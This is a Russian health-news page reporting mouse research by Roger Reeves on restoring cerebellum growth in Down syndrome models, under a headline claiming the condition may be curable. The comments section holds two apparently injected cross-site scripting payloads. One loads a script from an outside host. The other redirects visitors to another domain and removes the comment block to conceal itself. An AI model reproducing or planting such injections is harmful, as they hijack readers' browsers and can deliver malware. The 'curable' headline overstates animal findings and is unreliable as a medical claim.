Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Синдром Дауна может быть ...  >>  Синдром Дауна может быть излечим! Новости из США!
 
Обратная связь
 

Синдром Дауна может быть излечим! Новости из США!

Размер шрифта
07 октября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Люди, рожденные с синдромом Дауна, всегда считались неизлечимыми – до сегодняшнего дня. Новые медицинские исследования помогли создать препарат, который может улучшать состояние таких пациентов и в будущем сможет позволить им вести более полноценную и независимую жизнь. 

Синдром Дауна может быть излечим! Новости из США!

В течение последних лет ученым удалось обнаружить различные нарушения физиологических процессов в головном мозге, которые можно исправить при помощи лекарственных препаратов. Два таких исследования посвящены лечению людей с синдромом Дауна. Генетик Роджер Ривз из Университета Джона Хопкинса обнаружил одну из точек применения лекарств, при действии на которую можно нормализовать нарушения памяти и обучения, свойственные синдрому Дауна. 

Синдром Дауна развивается у одного из 1 000 новорожденных по всему миру. Он связан с наличием лишней копии двадцать первой хромосомы и повышенной активностью 300 из 500 ее генов. «Еще в 2004 году ученые знали очень мало о тех механизмах, которые ответственны за нарушение развития при синдроме Дауна», – рассказывает Майкл Гарпольд, глава Фонда исследования и лечения синдрома Дауна. «Но сейчас все изменилось. В последние годы произошло несколько крупных научных прорывов в понимании нейрохимии этого заболевания».

Полученные знания привели к обнаружению новых методик лечения синдрома Дауна. В частности, Ривз и его команда попытались восстановить размеры мозжечка у мыши. Мозжечок располагается в основании головного мозга и отвечает за контроль движений и баланс. У людей с синдромом Дауна размеры мозжечка примерно на 40% меньше, чем у здоровых людей. Ривз надеялся, что, восстановив размеры мозжечка, он сможет получить более полную картину тех процессов, которые приводят к нарушениям в головном мозге при синдроме Дауна.

Ученые ввели новорожденным мышам с синдромом Дауна вещество, стимулирующее один из важнейших механизмов развития нервной ткани, отвечающий в том числе и за рост мозжечка. «Нас не удивил тот факт, что нам удалось привести состояние мозжечка в норму. Это лишь подтвердило нашу рабочую гипотезу», – рассказывает Ривз. Однако он не ожидал, что после трех месяцев лечения мыши с восстановленным мозжечком смогут успешно обучаться тем навыкам, за которые отвечает другая область мозга – гиппокамп. Ученые до сих пор не знают наверняка, смогли ли они «случайно починить» гиппокамп или же мозжечок отвечает за большее количество процессов обучения и запоминания, чем считалось до сих пор. Стоит отметить, что другие изучаемые в настоящий момент методики лечения синдрома Дауна направлены непосредственно на восстановление нормальной функции гиппокампа.

Исследование Ривза может привести к разработке препарата, который позволит людям с синдромом Дауна вести более независимую жизнь. «Дать таким пациентам возможность значительно улучшить память и навыки обучения – о таком я даже не мог и мечтать», – говорит Ривз. «А сейчас это и правда происходит».

Именно благодаря таким достижениям современной науки, в скором времени нам возможно удастся значительно продвинуться вперед в борьбе со многими тяжелыми заболеваниями, до сих пор считавшимися неизлечимыми.

Как стать мамой здорового малыша – все об этом на страницах нашего специального проекта «Ребенок будет».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:31

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:28

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Всего лишь одно изменение в жизни поможет избежать выкидыша!   Вакцина, которую должен сделать каждый!   Учителя, которые запугивают детей, снижают баллы на ЕГЭ! Остановите их, пока не поздно!   Оставляете ребенка в яслях! Именно там его поджидают страшные опасности!  
08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты 03 октября 2013Результаты благотворительного марафона «Всем миром»
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
Можно ли подгадать с беременностью?
Первые шаги вашего малыша
Какой бутылкой кормить ребенка?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.